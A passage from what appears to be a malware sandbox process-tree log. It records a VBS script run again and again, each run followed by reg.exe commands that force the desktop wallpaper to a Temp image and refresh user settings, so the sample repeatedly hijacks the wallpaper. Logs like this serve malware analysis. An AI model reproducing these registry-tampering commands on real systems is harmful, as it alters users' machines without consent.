    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2976
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:824
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1204
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1836
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1864
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2036
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2824
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2812
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2840
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1156
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2428
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1848
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2584
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1700
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1452
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1696
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2948
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1896
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2068
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2928
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2040
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1256
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2912
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:536
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2152
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:876
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2636
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2372
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3036
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1684
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2728
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1692
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:1520
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2668
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2564
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1700
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:1284
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:972
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2928
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2040
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1256
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2912
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2100
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2764
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3036
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1684
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2760
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1356
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:352
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1144
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:796
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2756
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1104
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2268
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2368
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:1836
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:824
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2008
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2480
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2636
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2836
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1700
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:936
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1452
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:796
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2756
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:1064
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1204
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2680
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2764
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2812
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1684
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2940
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1104
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2268
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1620
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1784
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:972
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2452
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1644
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1776
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2956
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2764
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2812
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2760
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1104
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1620
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:972
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1052
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1604
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2480
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2812
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1844
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1992
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:760
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2968
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:1256
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:536
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:568
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2396
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:980
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1732
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:1700
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1104
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1620
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:972
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1052
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1460
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2816
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2968
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1580
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2668
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1104
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1620
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:1156
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2840
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1580
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2668
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1104
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1620
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:1844
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2668
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1620
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1052
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1460
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:568
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2912
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:980
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:1644
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2636
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3036
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1780
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
        5⤵
        
        PID:2840
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1620
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:980
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1644
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3036
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:760
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\11712.vbs
        5⤵
        
        PID:3120
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3140
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3152
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3172
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3180
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3188
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\11712.vbs
        5⤵
        
        PID:3296
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3324
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3336
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3348
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3356
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3364
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\11712.vbs
        5⤵
        
        PID:3532
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3552
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3572
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3584
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3592
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3600
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\11712.vbs
        5⤵
        
        PID:3780
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3816
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3824
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3832
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3840
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3848
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\11712.vbs
        5⤵
        
        PID:4004
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4024
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4044
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4056
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4064
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4072
    - - C:\Windows\system32\rundll32.exe
        
